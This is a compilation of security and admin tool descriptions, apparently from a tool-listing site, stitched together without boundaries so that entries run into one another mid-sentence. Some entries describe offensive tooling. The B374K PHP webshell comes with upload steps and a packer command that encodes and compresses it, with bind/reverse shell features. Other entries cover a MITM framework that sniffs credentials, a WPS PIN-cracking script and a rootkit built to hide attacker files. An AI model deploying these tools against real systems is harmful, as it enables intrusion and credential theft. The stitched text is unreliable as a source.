./autoReaver myAPTargets

ADDITIONAL FEATURES

- The script logs dates of PIN attempts, so you can check how often an AP is locked and for how long. The default directory for those logs is ReaverLastPinDates.

- The script logs each rate limit for every AP (default directory is /tmp/APLimitBSSID), so you can easily check when the last rate limit occurred.

- You can set up your attack using variables from the configurationSettings file (sleep/wait times between APs and loops, etc.).

- You can disable checking an AP by adding a "#" sign at the beginning of its line in the myAPTargets file (the AP will then be omitted from the loop).

- (added 2014-07-03) You can set up specific settings per access point.

To do that for AP with MAC AA:BB:CC:DD:EE:FF, just create file ./configurationSettingsPerAp/AABBCCDDEEFF

and put there variables from ./configurationSettings file that you want to change for example:

ADDITIONAL_OPTIONS="-g 10 -E -S -N -T 1 -t 15 -d 0 -x 3";
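The file name is simply the MAC address with the colons removed. A small Python sketch of that mapping, with a hypothetical helper name and the assumption that the name is always upper-case as in the example above:

```python
from pathlib import Path


def per_ap_settings_path(bssid, base_dir="./configurationSettingsPerAp"):
    """Map a BSSID such as AA:BB:CC:DD:EE:FF to its per-AP settings file."""
    # Assumption: the file name is the upper-cased MAC without separators.
    return Path(base_dir) / bssid.replace(":", "").upper()
```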

You can define channel as random by setting it's value (in myAPTargets file) to R, you can force script to automatically find AP channel.

Example:

AA:BB:CC:DD:EE:FF R MyWlanBut remember that you probably should also increase value of



BSSID_ONLINE_TIMEOUT variable - since hopping between all channels takes much more time than searching on one channel.Autorize - Automatic Authorization Enforcement Detection (Extension for Burp Suite)

Autorize is an automatic authorization enforcement detection extension for Burp Suite. It was written in Python by Barak Tawily, an application security expert at AppSec Labs. Autorize was designed to help security testers by performing automatic authorization tests.

Installation

- Download Burp Suite (obviously): http://portswigger.net/burp/download.html

- Download Jython standalone JAR: http://www.jython.org/downloads.html

- Open Burp -> Extender -> Options -> Python Environment -> Select File -> Choose the Jython standalone JAR

- Install Autorize from the BApp Store or follow these steps:

- Download the Autorize.py file.

- Open Burp -> Extender -> Extensions -> Add -> Choose Autorize.py file.

- See the Autorize tab and enjoy automatic authorization detection :)

User Guide - How to use?

- After installation, the Autorize tab will be added to Burp.

- Open the configuration tab (Autorize -> Configuration).

- Get your low-privileged user authorization token header (Cookie / Authorization) and copy it into the textbox containing the text "Insert injected header here".

- Click on "Intercept is off" to start intercepting the traffic in order to allow Autorize to check for authorization enforcement.

- Open a browser and configure the proxy settings so the traffic will be passed to Burp.

- Browse to the application you want to test as a high-privileged user.

- The Autorize table will show you the request's URL and enforcement status.

- It is possible to click on a specific URL and see the original/modified request/response in order to investigate the differences.

Authorization Enforcement Status

There are 3 enforcement statuses:

- Authorization bypass! - Red color

- Authorization enforced! - Green color

- Authorization enforced??? (please configure enforcement detector) - Yellow color

The first 2 statuses are clear, so I won’t elaborate on them.

The 3rd status means that Autorize cannot determine whether authorization is enforced, so it asks you to configure a filter in the enforcement detector tab.

The enforcement detector filters allow Autorize to detect authorization enforcement by a fingerprint (a string in the message body) or by the content-length of the server's response.

For example, if a request's enforcement status is detected as "Authorization enforced??? (please configure enforcement detector)", you can investigate the modified/original response and see that the modified response body includes the string "You are not authorized to perform action". You can then add a filter with the fingerprint value "You are not authorized to perform action", and Autorize will look for this fingerprint and automatically detect that authorization is enforced. The same can be done by defining a content-length filter.
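The three statuses and the two filter types can be illustrated with a short Python sketch. This is not Autorize's actual code: the function `enforcement_status` and its parameters are hypothetical, and the rule that an identical response body counts as a bypass is an assumption made to keep the example small. Body length is also used as a stand-in for the Content-Length header.

```python
BYPASS = "Authorization bypass!"
ENFORCED = "Authorization enforced!"
UNKNOWN = "Authorization enforced??? (please configure enforcement detector)"


def enforcement_status(original_body, modified_body, fingerprints=(), content_lengths=()):
    """Classify the response to a request replayed with the low-privileged header."""
    # A fingerprint hit means the server visibly refused the replayed request.
    if any(fp in modified_body for fp in fingerprints):
        return ENFORCED
    # A content-length filter works the same way, keyed on the response size.
    if len(modified_body) in content_lengths:
        return ENFORCED
    # Assumption: an identical body means the low-privileged user got the same data.
    if modified_body == original_body:
        return BYPASS
    return UNKNOWN
```

With no filters configured, a response that differs from the original falls into the third status, which is exactly the case where adding a fingerprint such as "You are not authorized to perform action" resolves the ambiguity.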



AVCaesar - Malware Analysis Engine and Repository

AVCaesar is a malware analysis engine and repository, developed by malware.lu within the FP7 project CockpitCI.

Functionalities

AVCaesar can be used to:

- Perform an efficient malware analysis of suspicious files based on the results of a set of antivirus solutions, bundled together to reach the highest possible probability to detect potential malware;

- Search for malware samples in a progressively increasing malware repository.

The basic functionalities can be extended by:

- Download malware samples (15 samples/day for registered users and 100 samples/day for premium users);

- Perform confidential malware analysis (reserved to premium users)

Malware analysis process

The malware analysis process is kept as easy and intuitive as possible for AVCaesar users:

- Submit suspicious file via AVCaesar web interface. Premium users can choose to perform a confidential analysis.

- Receive a well-structured malware analysis report.



B374K - PHP Webshell with handy features

This PHP shell is a useful tool for system or web administrators to do remote management without using cPanel or connecting over SSH, FTP, etc. All actions take place within a web browser.

Features :

- File manager (view, edit, rename, delete, upload, download, archiver, etc)

- Search file, file content, folder (also using regex)

- Command execution

- Script execution (php, perl, python, ruby, java, node.js, c)

- Give you shell via bind/reverse shell connect

- Simple packet crafter

- Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)

- SQL Explorer

- Process list/Task manager

- Send mail with attachment (you can attach local file on server)

- String conversion

- All of that in only 1 file, no installation needed

- Supports PHP > 4.3.3 and PHP 5

Requirements :

- PHP version > 4.3.3 and PHP 5

- As it uses zepto.js v1.1.2, you need a modern browser to use the b374k shell. See browser support on the zepto.js website http://zeptojs.com/

- Responsibility for what you do with this shell

Installation :

Download b374k.php (default password: b374k), edit it to change the password, and upload b374k.php to your server. The password is stored in sha1(md5()) format. Alternatively, create your own b374k.php as explained below.
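For reference, the nested hash can be computed outside PHP as well. The sketch below assumes the usual PHP behaviour, where md5() returns a lowercase hex string and sha1() is then applied to that string; the function name `sha1_of_md5` is hypothetical.

```python
import hashlib


def sha1_of_md5(password):
    """Return sha1(md5(password)) as PHP computes it with default arguments."""
    # PHP's md5() yields a 32-character hex string, which sha1() then hashes.
    inner = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hashlib.sha1(inner.encode("ascii")).hexdigest()
```

The result is a 40-character hex string.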

Customize :

After you finish editing the files, upload index.php, base, module, theme and all files inside them to a server.

Using Web Browser :

Open index.php in your browser. Quick run will only run the shell. Use the packer to pack all files into a single PHP file. Set the options you need; the output file will be in the same directory as index.php.

Using Console :

$ php -f index.php

b374k shell packer 0.4

options :

-o filename save as filename

-p password protect with password

-t theme theme to use

-m modules modules to pack separated by comma

-s strip comments and whitespaces

-b encode with base64

-z [no|gzdeflate|gzencode|gzcompress] compression (use only with -b)

-c [0-9] level of compression

-l list available modules

-k list available themes

$ php -f index.php -- -o myShell.php -p myPassword -s -b -z gzcompress -c 9





Babun - A Windows shell you will love!

Would you like to use a Linux-like console on a Windows host without a lot of fuss? Try out babun!

Installation

Just download the dist file from http://babun.github.io, unzip it and run the install.bat script. After a few minutes babun starts automatically.

The application will be installed to the %USER_HOME%\.babun directory. Use the /target option to install babun to a custom directory.

Features in 10 seconds

Babun features the following:

- Pre-configured Cygwin with a lot of addons

- Silent command-line installer, no admin rights required

- pact - advanced package manager (like apt-get or yum)

- xTerm-256 compatible console

- HTTP(s) proxying support

- Plugin-oriented architecture

- Pre-configured git and shell

- Integrated oh-my-zsh

- Auto update feature

- "Open Babun Here" context menu entry

Features in 3 minutes

Cygwin

The core of Babun consists of a pre-configured Cygwin. Cygwin is a great tool, but there are a lot of quirks and tricks that make you lose a lot of time before it is actually usable. Not only does babun solve most of these problems, but it also contains a lot of vital packages, so that you can be productive from the very first minute.

Package manager

Babun provides a package manager called pact. It is similar to apt-get or yum. Pact enables installing, searching, upgrading and uninstalling cygwin packages with no hassle at all. Just invoke pact --help to check how to use it.

Shell

Babun’s shell is tweaked in order to provide the best possible user experience. There are two shell types that are pre-configured and available right away: bash and zsh (zsh is the default one). Babun’s shell features:

- syntax highlighting

- UNIX tools

- software development tools

- git-aware prompt

- custom scripts and aliases

- and much more!

Console

Mintty is the console used in babun. It features an xterm-256 mode, nice fonts and simply looks great!

Proxying

Babun supports HTTP proxying out of the box. Just add the address and the credentials of your HTTP proxy server to the .babunrc file located in your home folder and execute source .babunrc to enable HTTP proxying. SOCKS proxies are not supported for now.

Developer tools

Babun provides many packages, convenience tools and scripts that make your life much easier. The long list of features includes:

- programming languages (Python, Perl, etc.)

- git (with a wide variety of aliases and tweaks)

- UNIX tools (grep, wget, curl, etc.)

- vcs (svn, git)

- oh-my-zsh

- custom scripts (pbcopy, pbpaste, babun, etc.)

Plugin architecture

Babun has a very small microkernel (cygwin, a couple of bash scripts and a bit of convention) and a plugin architecture on top of it. It means that almost everything is a plugin in babun’s world! Not only does it structure babun in a clean way, but it also enables others to contribute small chunks of code. Currently, babun comprises the following plugins:

- cacert

- core

- git

- oh-my-zsh

- pact

- cygdrive

- dist

- shell

Auto-update

Self-update is at the very heart of babun! Many Cygwin tools are simple bash scripts: once you install them there is no chance of getting a newer version in a smooth way. You either delete the older version or overwrite it with the newest one, losing all the changes you have made in between.

Babun contains an auto-update feature which enables updating the microkernel, the plugins and even the underlying cygwin. Files located in your home folder will never be deleted or overwritten, which preserves your local config and customizations.

Installer

Babun features a silent command-line installation script that may be executed without admin rights on any Windows host.

Using babun

Setting up proxy

To setup proxy uncomment following lines in the

.babunrc file (%USER_HOME%\.babun\cygwin\home\USER\.babunrc)# Uncomment this lines to set up your proxy

# export http_proxy=http://user:password@server:port

# export https_proxy=$http_proxy

# export ftp_proxy=$http_proxy



# export no_proxy=localhostSetting up git

Babun has a pre-configured git. The only thing you should do after the installation is to add your name and email to the git config:

git config --global user.name "your name"

git config --global user.email "your@email.com"

There are a lot of great git aliases provided by the git plugin:

gitalias['alias.cp']='cherry-pick'

gitalias['alias.st']='status -sb'

gitalias['alias.cl']='clone'

gitalias['alias.ci']='commit'

gitalias['alias.co']='checkout'

gitalias['alias.br']='branch'

gitalias['alias.dc']='diff --cached'

gitalias['alias.lg']="log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %Cblue<%an>%Creset' --abbrev-commit --date=relative --all"

gitalias['alias.last']='log -1 --stat'

gitalias['alias.unstage']='reset HEAD --'

Installing and removing packages

Babun is shipped with pact, a Linux-like package manager. It uses the cygwin repository for downloading packages:

{ ~ } » pact install arj ~

Working directory is /setup

Mirror is http://mirrors.kernel.org/sourceware/cygwin/

setup.ini taken from the cache

Installing arj

Found package arj

--2014-03-30 19:34:38-- http://mirrors.kernel.org/sourceware/cygwin//x86/release/arj/arj-3.10.22-1.tar.bz2

Resolving mirrors.kernel.org (mirrors.kernel.org)... 149.20.20.135, 149.20.4.71, 2001:4f8:1:10:0:1994:3:14, ...

Connecting to mirrors.kernel.org (mirrors.kernel.org)|149.20.20.135|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 189944 (185K) [application/x-bzip2]

Saving to: `arj-3.10.22-1.tar.bz2'

100%[=======================================>] 189,944 193K/s in 1.0s

2014-03-30 19:34:39 (193 KB/s) - `arj-3.10.22-1.tar.bz2' saved [189944/189944]

Unpacking...

Package arj installed

Here’s the list of all pact’s features:

{ ~ } » pact --help

pact: Installs and removes Cygwin packages.

Usage:

"pact install <package names>" to install given packages

"pact remove <package names>" to remove given packages

"pact update <package names>" to update given packages

"pact show" to show installed packages

"pact find <patterns>" to find packages matching patterns

"pact describe <patterns>" to describe packages matching patterns

"pact packageof <commands or files>" to locate parent packages

"pact invalidate" to invalidate pact caches (setup.ini, etc.)

Options:

--mirror, -m <url> : set mirror

--invalidate, -i : invalidates pact caches (setup.ini, etc.)

--force, -f : force the execution

--help

--version

Changing the default shell

zsh (with oh-my-zsh) is babun’s default shell.

Executing the following command will output your default shell:

{ ~ } » babun shell ~

/bin/zsh

In order to change your default shell execute:

{ ~ } » babun shell /bin/bash ~

/bin/zsh

/bin/bash

The output contains two lines: the previous default shell and the new default shell



Checking the configuration

Execute the following command to check the configuration:

{ ~ } » babun check ~

Executing babun check

Prompt speed [OK]

Connection check [OK]

Update check [OK]

Cygwin check [OK]

By executing this command you can also check whether there is a newer cygwin version available:

{ ~ } » babun check ~

Executing babun check

Prompt speed [OK]

Connection check [OK]

Update check [OK]

Cygwin check [OUTDATED]

Hint: the underlying Cygwin kernel is outdated. Execute 'babun update' and follow the instructions!

It will check if there are problems with the speed of the git prompt, if there’s access to the Internet or finally if you are running the newest version of babun.

The command will output hints if problems occur:

{ ~ } » babun check ~

Executing babun check

Prompt speed [SLOW]

Hint: your prompt is very slow. Check the installed 'BLODA' software.

Connection check [OK]

Update check [OK]

Cygwin check [OK]

On startup, but at most once every 24 hours, babun will execute this check automatically. You can disable the automatic check in the ~/.babunrc file.
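If you want to act on the check results from a script, the output format shown above is easy to parse. The following Python sketch is only an illustration based on the sample outputs in this section; `parse_babun_check` is a hypothetical helper, not part of babun.

```python
import re

# Matches lines such as "Prompt speed [OK]" or "Cygwin check [OUTDATED]".
CHECK_LINE = re.compile(r"^(?P<name>.+?)\s+\[(?P<status>[A-Z]+)\]$")


def parse_babun_check(output):
    """Return (results, hints): check name -> status, plus any hint lines."""
    results, hints = {}, []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("Hint:"):
            hints.append(line[len("Hint:"):].strip())
            continue
        match = CHECK_LINE.match(line)
        if match:
            results[match.group("name")] = match.group("status")
    return results, hints
```

Any status other than OK, together with its hint, can then be reported or logged.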

Tweaking the configuration

You can tweak some config options in the ~/.babunrc file. Here’s the full list of variables that may be modified:

# JVM options

export JAVA_OPTS="-Xms128m -Xmx256m"

# Modify these lines to set your locale

export LANG="en_US.UTF-8"

export LC_CTYPE="en_US.UTF-8"

export LC_ALL="en_US.UTF-8"

# Uncomment these lines to the set your machine's default locale (and comment out the UTF-8 ones)

# export LANG=$(locale -uU)

# export LC_CTYPE=$(locale -uU)

# export LC_ALL=$(locale -uU)

# Uncomment this to disable daily auto-update & proxy checks on startup (not recommended!)

# export DISABLE_CHECK_ON_STARTUP="true"

# Uncomment to increase/decrease the check connection timeout

# export CHECK_TIMEOUT_IN_SECS=4

# Uncomment this lines to set up your proxy

# export http_proxy=http://user:password@server:port

# export https_proxy=$http_proxy

# export ftp_proxy=$http_proxy

# export no_proxy=localhost

Updating babun

To update babun to the newest version execute:

babun update

Please note that your local configuration files will not be overwritten.

The babun update command will also update the underlying cygwin version if a newer version is available. In such a case babun will download the new cygwin installer, close itself and start the cygwin installation process. Once the cygwin installation is completed babun will restart.

BackBox Linux 4.2 - Ubuntu-based Linux Distribution Penetration Test and Security Assessment

BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. Designed to be fast, easy to use and provide a minimal yet complete desktop environment, thanks to its own software repositories, always being updated to the latest stable version of the most used and best known ethical hacking tools.

The BackBox Team is pleased to announce the updated release of BackBox Linux, the version 4.2! This release includes features such as Linux Kernel 3.16 and Ruby 2.1.

What's new

- Preinstalled Linux Kernel 3.16

- New Ubuntu 14.04.2 base

- Ruby 2.1

- Installer with LVM and Full Disk Encryption options

- Handy Thunar custom actions

- RAM wipe at shutdown/reboot

- System improvements

- Upstream components

- Bug corrections

- Performance boost

- Improved Anonymous mode

- Predisposition to ARM architecture (armhf Debian packages)

- Predisposition to BackBox Cloud platform

- New and updated hacking tools: beef-project, crunch, fang, galleta, jd-gui, metasploit-framework, pasco, pyew, rifiuti2, setoolkit, theharvester, tor, torsocks, volatility, weevely, whatweb, wpscan, xmount, yara, zaproxy

System requirements

- 32-bit or 64-bit processor

- 512 MB of system memory (RAM)

- 6 GB of disk space for installation

- Graphics card capable of 800×600 resolution

- DVD-ROM drive or USB port (2 GB)



BackBox Linux 4.3 - Ubuntu-based Linux Distribution Penetration Test and Security Assessment

BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. Designed to be fast, easy to use and provide a minimal yet complete desktop environment, thanks to its own software repositories, always being updated to the latest stable version of the most used and best known ethical hacking tools.

What's new

- Preinstalled Linux Kernel 3.16

- New Ubuntu 14.04.2 base

- Ruby 2.1

- Installer with LVM and Full Disk Encryption options

- Handy Thunar custom actions

- RAM wipe at shutdown/reboot

- System improvements

- Upstream components

- Bug corrections

- Performance boost

- Improved Anonymous mode

- Predisposition to ARM architecture (armhf Debian packages)

- Predisposition to BackBox Cloud platform

- New and updated hacking tools: beef-project, btscanner, dirs3arch, metasploit-framework, ophcrack, setoolkit, tor, weevely, wpscan, etc.

System requirements

- 32-bit or 64-bit processor

- 512 MB of system memory (RAM)

- 6 GB of disk space for installation

- Graphics card capable of 800×600 resolution

- DVD-ROM drive or USB port (2 GB)

Upgrade instructions

To upgrade from a previous version (BackBox 4.x) follow these instructions:

sudo apt-get update

sudo apt-get dist-upgrade

sudo apt-get install -f

sudo apt-get install linux-image-generic-lts-utopic linux-headers-generic-lts-utopic linux-signed-image-generic-lts-utopic

sudo apt-get purge ri1.9.1 ruby1.9.1 ruby1.9.3 bundler

sudo gem cleanup

sudo rm -rf /var/lib/gems/1.*

sudo apt-get install backbox-default-settings backbox-desktop backbox-tools --reinstall

sudo apt-get install beef-project metasploit-framework whatweb wpscan setoolkit --reinstall

sudo apt-get autoremove --purge

BackBox Linux 4.4 - Ubuntu-based Linux Distribution Penetration Test and Security Assessment

BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. Designed to be fast, easy to use and provide a minimal yet complete desktop environment, thanks to its own software repositories, always being updated to the latest stable version of the most used and best known ethical hacking tools.

The release has some special new features included to keep BackBox up to date with the latest developments in the security world. Tools such as OpenVAS and Automotive Analysis will make a big difference. BackBox 4.4 also comes with Kernel 3.19.

What's new

- Preinstalled Linux Kernel 3.19

- New Ubuntu 14.04.3 base

- Ruby 2.1

- Installer with LVM and Full Disk Encryption options

- Handy Thunar custom actions

- RAM wipe at shutdown/reboot

- System improvements

- Upstream components

- Bug corrections

- Performance boost

- Improved Anonymous mode

- Automotive Analysis category

- Predisposition to ARM architecture (armhf Debian packages)

- Predisposition to BackBox Cloud platform

- New and updated hacking tools: apktool, armitage, beef-project, can-utils, dex2jar, fimap, jd-gui, metasploit-framework, openvas, setoolkit, sqlmap, tor, weevely, wpscan, zaproxy, etc.

System requirements

- 32-bit or 64-bit processor

- 512 MB of system memory (RAM)

- 6 GB of disk space for installation

- Graphics card capable of 800×600 resolution

- DVD-ROM drive or USB port (2 GB)

Upgrade instructions

To upgrade from a previous version (BackBox 4.x) follow these instructions:

sudo apt-get update

sudo apt-get dist-upgrade

sudo apt-get install -f

sudo apt-get install linux-image-generic-lts-vivid linux-headers-generic-lts-vivid linux-signed-image-generic-lts-vivid

sudo apt-get purge ri1.9.1 ruby1.9.1 ruby1.9.3 bundler

sudo gem cleanup

sudo rm -rf /var/lib/gems/1.*

sudo apt-get install backbox-default-settings backbox-desktop backbox-menu backbox-tools --reinstall

sudo apt-get install beef-project metasploit-framework whatweb wpscan setoolkit --reinstall

sudo apt-get autoremove --purge

sudo apt-get install openvas sqlite3

sudo openvas-launch sync

sudo openvas-launch start

Bacula - Network Backup Tool for Linux, Unix, Mac, and Windows

Bacula is a set of computer programs that permits the system administrator to manage backup, recovery, and verification of computer data across a network of computers of different kinds. Bacula can also run entirely upon a single computer and can backup to various types of media, including tape and disk.

In technical terms, it is a network Client/Server based backup program. Bacula is relatively easy to use and efficient, while offering many advanced storage management features that make it easy to find and recover lost or damaged files. Due to its modular design, Bacula is scalable from small single computer systems to systems consisting of hundreds of computers located over a large network.

Who Needs Bacula?

If you are currently using a program such as tar, dump, or bru to back up your computer data, and you would like a network solution, more flexibility, or catalog services, Bacula will most likely provide the additional features you want. However, if you are new to Unix systems or do not have offsetting experience with a sophisticated backup package, the Bacula project does not recommend using Bacula as it is much more difficult to set up and use than tar or dump.

If you want Bacula to behave like the above mentioned simple programs and write over any tape that you put in the drive, then you will find working with Bacula difficult. Bacula is designed to protect your data following the rules you specify, and this means reusing a tape only as the last resort. It is possible to “force” Bacula to write over any tape in the drive, but it is easier and more efficient to use a simpler program for that kind of operation.

If you would like a backup program that can write to multiple volumes (i.e. is not limited by your tape drive capacity), Bacula can most likely fill your needs. In addition, quite a number of Bacula users report that Bacula is simpler to set up and use than other equivalent programs.

If you are currently using a sophisticated commercial package such as Legato Networker, ARCserveIT, Arkeia, or PerfectBackup+, you may be interested in Bacula, which provides many of the same features and is free software available under the GNU Version 2 software license.

Bacula Components or Services

Bacula is made up of the following five major components or services: Director, Console, File, Storage, and Monitor services.

Bacula Director

The Bacula Director service is the program that supervises all the backup, restore, verify and archive operations. The system administrator uses the Bacula Director to schedule backups and to recover files. For more details see the Director Services Daemon Design Document in the Bacula Developer’s Guide. The Director runs as a daemon (or service) in the background.

Bacula Console

The Bacula Console service is the program that allows the administrator or user to communicate with the Bacula Director. Currently, the Bacula Console is available in three versions: text-based console interface, QT-based interface, and a wxWidgets graphical interface. The first and simplest is to run the Console program in a shell window (i.e. TTY interface). Most system administrators will find this completely adequate. The second version is a GNOME GUI interface that is far from complete, but quite functional as it has most of the capabilities of the shell Console. The third version is a wxWidgets GUI with an interactive file restore. It also has most of the capabilities of the shell console, allows command completion with tabulation, and gives you instant help about the command you are typing. For more details see the Bacula Console Design Document.

Bacula File

The Bacula File service (also known as the Client program) is the software program that is installed on the machine to be backed up. It is specific to the operating system on which it runs and is responsible for providing the file attributes and data when requested by the Director. The File services are also responsible for the file system dependent part of restoring the file attributes and data during a recovery operation. For more details see the File Services Daemon Design Document in the Bacula Developer’s Guide. This program runs as a daemon on the machine to be backed up. In addition to Unix/Linux File daemons, there is a Windows File daemon (normally distributed in binary format). The Windows File daemon runs on current Windows versions (NT, 2000, XP, 2003, and possibly Me and 98).

Bacula Storage

The Bacula Storage services consist of

the software programs that perform the storage and recovery of the file

attributes and data to the physical backup media or volumes. In other

words, the Storage daemon is responsible for reading and writing your

tapes (or other storage media, e.g. files). For more details see the

Storage Services Daemon Design Document in the Bacula Developer’s Guide.

The Storage services run as a daemon on the machine that has the

backup device (usually a tape drive).

Catalog

The Catalog services are comprised of

the software programs responsible for maintaining the file indexes and

volume databases for all files backed up. The Catalog services permit

the system administrator or user to quickly locate and restore any

desired file. The Catalog services set Bacula apart from simple backup

programs like tar and bru, because the catalog maintains a record of all

Volumes used, all Jobs run, and all Files saved, permitting efficient

restoration and Volume management. Bacula currently supports three

different databases, MySQL, PostgreSQL, and SQLite, one of which must be

chosen when building Bacula.
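To illustrate why a catalog makes restores efficient, here is a minimal sketch using Python's built-in sqlite3 module. The table and column names (`volumes`, `jobs`, `files`) and the sample rows are hypothetical and far simpler than Bacula's actual catalog schema. The point is only that an indexed record of Volumes, Jobs, and Files lets you find which volume holds a file without reading the backup media.

```python
import sqlite3

def build_catalog():
    """Create an in-memory toy catalog (hypothetical schema, not Bacula's)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE volumes (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE jobs (id INTEGER PRIMARY KEY, name TEXT,
                           volume_id INTEGER REFERENCES volumes(id));
        CREATE TABLE files (id INTEGER PRIMARY KEY, path TEXT,
                            job_id INTEGER REFERENCES jobs(id));
        CREATE INDEX files_path ON files(path);
    """)
    db.executemany("INSERT INTO volumes VALUES (?, ?)",
                   [(1, "Tape-0001"), (2, "Tape-0002")])
    db.executemany("INSERT INTO jobs VALUES (?, ?, ?)",
                   [(1, "nightly-mon", 1), (2, "nightly-tue", 2)])
    db.executemany("INSERT INTO files VALUES (?, ?, ?)",
                   [(1, "/etc/hosts", 1),
                    (2, "/home/alice/notes.txt", 1),
                    (3, "/etc/hosts", 2)])
    db.commit()
    return db

def locate(db, path):
    """Return (job name, volume name) pairs holding a copy of path, highest job id first."""
    rows = db.execute("""
        SELECT jobs.name, volumes.name FROM files
        JOIN jobs ON jobs.id = files.job_id
        JOIN volumes ON volumes.id = jobs.volume_id
        WHERE files.path = ?
        ORDER BY jobs.id DESC""", (path,))
    return rows.fetchall()

if __name__ == "__main__":
    print(locate(build_catalog(), "/etc/hosts"))
```

A single indexed query answers "which volume do I need to mount?", which is the kind of lookup a plain tar archive cannot offer without being read from start to end.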

The three SQL databases currently

supported (MySQL, PostgreSQL or SQLite) provide quite a number of

features, including rapid indexing, arbitrary queries, and security.

Although the Bacula project plans to support other major SQL databases,

the current Bacula implementation interfaces only to MySQL, PostgreSQL

and SQLite. For the technical and porting details see the Catalog

Services Design Document in the Bacula Developer’s Guide.

The packages for MySQL and PostgreSQL

are available for several operating systems. Alternatively, installing

from the source is quite easy, see the Installing and Configuring

MySQL chapter of this document for the details. For more

information on MySQL, please see: http://www.mysql.com. Or

see the Installing and Configuring PostgreSQL chapter

of this document for the details. For more information on PostgreSQL,

please see: http://www.postgresql.org.

Configuring and building SQLite is

even easier. For the details of configuring SQLite, please see the

Installing and Configuring SQLite chapter of this

document.

Bacula Monitor

A Bacula Monitor service is the

program that allows the administrator or user to watch the current status of

Bacula Directors, Bacula File Daemons and Bacula Storage Daemons.

Currently, only a GTK+ version is available, which works with GNOME,

KDE, or any window manager that supports the FreeDesktop.org system tray

standard.

To perform a successful save or

restore, the following four daemons must be configured and running: the

Director daemon, the File daemon, the Storage daemon, and the Catalog

service (MySQL, PostgreSQL or SQLite).
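As a quick sanity check before running a job, the sketch below tests whether the three network daemons accept TCP connections. It assumes the default Bacula ports (9101 for the Director, 9102 for the File daemon, 9103 for the Storage daemon); the host layout in the usage example is hypothetical. A successful connection only shows that something is listening on the port, not that the daemon is correctly configured, and the catalog database is not checked here.

```python
import socket

# Default TCP ports of the Bacula daemons; adjust if your configuration differs.
DEFAULT_PORTS = {"director": 9101, "file": 9102, "storage": 9103}

def port_open(host, port, timeout=1.0):
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def check_daemons(hosts, ports=DEFAULT_PORTS):
    """Map each daemon name in hosts to True/False (port reachable or not).

    hosts maps a daemon name to the machine it runs on.
    """
    return {name: port_open(hosts[name], ports[name]) for name in hosts}

if __name__ == "__main__":
    # Hypothetical layout: all three daemons on the local machine.
    layout = {"director": "localhost", "file": "localhost", "storage": "localhost"}
    for name, ok in check_daemons(layout).items():
        print(f"{name}: {'listening' if ok else 'not reachable'}")
```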



Beeswarm - Active IDS made easy

Beeswarm is an active IDS project that provides easy configuration, deployment and management of honeypots and

clients. The system operates by luring the hacker into the honeypots by setting up a deception infrastructure where

deployed drones communicate with honeypots and intentionally leak credentials while doing so.

The project has been released in a beta version; a stable version is expected within three months.

Installing and starting the server

On the VM to be set up as the server, perform the following steps. Make sure to write down the administrative password.

$ sudo apt-get install libffi-dev build-essential python-dev python-pip libssl-dev libxml2-dev libxslt1-dev

$ pip install pydes --allow-external pydes --allow-unverified pydes

$ pip install beeswarm

Downloading/unpacking beeswarm

...

Successfully installed Beeswarm

Cleaning up...

$ mkdir server_workdir

$ cd server_workdir/

$ beeswarm --server

...

****************************************************************************

Default password for the admin account is: uqbrlsabeqpbwy

****************************************************************************
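Since the password is printed only in the start-up output, it can be convenient to pull it out of a captured log rather than copy it by hand. The following is a small sketch that assumes you have the server output available as a string (for example, read from a log file you redirected it to). The function name is hypothetical, and the pattern simply mirrors the line shown in the output above.

```python
import re

# Matches the line printed at first start-up, as shown in the output above.
PASSWORD_LINE = re.compile(r"Default password for the admin account is:\s*(\S+)")

def extract_admin_password(output):
    """Return the password found in the server's start-up output, or None."""
    match = PASSWORD_LINE.search(output)
    return match.group(1) if match else None

if __name__ == "__main__":
    sample = (
        "****\n"
        "Default password for the admin account is: uqbrlsabeqpbwy\n"
        "****\n"
    )
    print(extract_admin_password(sample))
```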



...

BetterCap - A complete, modular, portable and easily extensible MITM framework

BetterCap is an attempt to create a complete, modular, portable and easily extensible MITM framework with every kind of feature that could be needed while performing a man-in-the-middle attack.

It is currently able to sniff and print the following information from the network:

- URLs being visited.

- HTTPS host being visited.

- HTTP POSTed data.

- FTP credentials.

- IRC credentials.

- POP, IMAP and SMTP credentials.

- NTLMv1/v2 ( HTTP, SMB, LDAP, etc ) credentials.
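To give a feel for what "sniffing URLs and POSTed data" involves, here is a minimal Python sketch that parses one already-captured HTTP request payload. It is not BetterCap's code; the function name is hypothetical, and it assumes the whole request arrived in a single plaintext TCP payload, which real traffic does not guarantee.

```python
def parse_http_request(raw):
    """Parse raw HTTP/1.x request bytes into method, URL and body.

    Returns None if the payload does not look like an HTTP request.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    method, path, _version = parts

    # Collect headers into a dict with lower-cased names.
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()

    host = headers.get("host", "")
    return {
        "method": method,
        "url": f"http://{host}{path}",  # plaintext HTTP is assumed
        "body": body.decode("latin-1"),
    }

if __name__ == "__main__":
    payload = (b"POST /search HTTP/1.1\r\n"
               b"Host: example.com\r\n"
               b"Content-Length: 14\r\n\r\n"
               b"q=test&lang=en")
    print(parse_http_request(payload))
```

A real sniffer also has to reassemble TCP streams and handle requests split across packets; this sketch skips both to keep the parsing step visible.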

DEPENDS

- colorize (gem install colorize)

- packetfu (gem install packetfu)

- pcaprub (gem install pcaprub) [sudo apt-get install ruby-dev libpcap-dev]

Beurk - Experimental Unix Rootkit

BEURK is a userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.

NOTE: BEURK is a recursive acronym for BEURK Experimental Unix RootKit





Features

- Hide attacker files and directories

